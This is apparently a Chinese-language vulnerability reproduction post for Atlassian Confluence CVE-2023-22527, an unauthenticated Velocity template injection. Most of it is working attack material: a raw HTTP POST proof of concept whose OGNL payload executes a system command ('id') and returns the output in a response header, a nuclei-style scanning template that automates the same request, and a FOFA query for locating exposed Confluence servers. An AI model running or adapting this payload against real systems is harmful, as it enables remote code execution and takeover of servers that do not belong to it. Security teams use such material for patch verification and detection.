【漏洞复现】Atlassian Confluence RCE(CVE-2023-22527)

Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件，提供了一个集中化的平台，用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。

Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入，未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行，可导致服务器失陷。

漏洞POC

POST /template/aui/text-inline.vm HTTP/1.1
Host: 192.168.0.70:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

id: AtlassianConfluenceRCE-CVE-2023-22527
info:
name: CVE-2023-22527
author: xxx
severity: info
description: description
reference:
- https://wiki.agora.ru/
metadata:
fofa-query: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
tags: confluence
requests:
- raw:
- "POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding:\
\ gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent:\
\ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\
\ Gecko) Chrome/119.0.6045.159 Safari/537.36\nConnection: close\nContent-Type:\
\ application/x-www-form-urlencoded\nContent-Length: 288\n\nlabel=\\u0027%2b#request\\\
u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\\
u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new\
\ freemarker.template.utility.Execute()).exec({\"id\"})) "
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(all_headers,"X-Cmd-Response") && status_code==200